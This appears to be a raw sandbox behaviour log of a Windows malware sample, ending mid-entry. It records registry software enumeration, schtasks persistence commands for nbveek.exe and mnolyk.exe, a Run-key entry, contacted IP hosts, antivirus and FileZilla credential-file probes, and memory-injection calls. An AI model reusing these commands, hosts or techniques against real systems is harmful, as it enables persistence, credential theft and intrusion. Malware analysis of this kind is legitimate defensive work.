regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

 regkey_r: Fontcore
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

 regkey_r: Google Chrome
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

 regkey_r: Haansoft HWord 80 Korean
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

 regkey_r: IE40
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

 regkey_r: IE4Data
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExW

 regkey_r: IE5BAKEX
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExW

 regkey_r: IEData
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExW

 regkey_r: MobileOptionPack
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExW

 regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko)
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)
1 0 0

RegOpenKeyExW

 regkey_r: Office15.PROPLUSR
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR
1 0 0

RegOpenKeyExW

 regkey_r: SchedulingAgent
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExW

 regkey_r: WIC
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExW

 regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}
1 0 0

RegOpenKeyExW

 regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExW

 regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExW

 regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}
1 0 0

RegOpenKeyExW

 regkey_r: {4A03706F-666A-4037-7777-5F2748764D10}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}
1 0 0

RegOpenKeyExW

 regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0015-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0016-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0018-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0019-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001A-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001B-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-040C-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-002C-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0044-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-006E-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0090-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00A1-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E1-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-00E2-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0115-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-0117-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {90150000-012B-0409-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {91150000-0011-0000-0000-0000000FF1CE}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExW

 regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExW

 regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

 regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}
1 0 0

RegOpenKeyExW

 regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561}
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}
1 0 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
wmi SELECT * FROM Win32_Processor
buffer Buffer with sha1: d654256406a4d27611366b4439d53bc02bb04f6c
host 176.113.115.17
host 193.233.20.15
host 193.233.20.16
host 193.233.20.17
host 45.32.218.145
host 62.204.41.245
host 62.204.41.88
host 79.110.62.167
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 3044
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000002c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2976
region_size: 204800
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000284
1 0 0
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

 service_handle: 0x0000000001217980
service_name: None
control_code: 1
0 0

ControlService

 service_handle: 0x0000000001217c20
service_name: None
control_code: 1
0 0
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\truno.exe reg_value C:\Users\test22\AppData\Local\Temp\1000003051\truno.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\test22\AppData\Local\Temp\4f9dd6f8a7\mnolyk.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

 module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: @
base_address: 0xfffde008
process_identifier: 3044
process_handle: 0x0000002c
1 1 0
Time & API Arguments Status Return Repeated

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 7-Zip 20.02 alpha
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Mozilla Thunderbird 78.4.0 (x86 ko)
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Professional Plus 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe AIR
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java 8 Update 131
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Java Auto Updater
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Access MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Excel MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft PowerPoint MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Publisher MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Outlook MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Word MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - English
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Outils de vérification linguistique 2013 de Microsoft Office - Français
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing Tools 2013 - Español
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft InfoPath MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft DCF MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft OneNote MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Groove MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OSM MUI (English) 2013
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x00000398
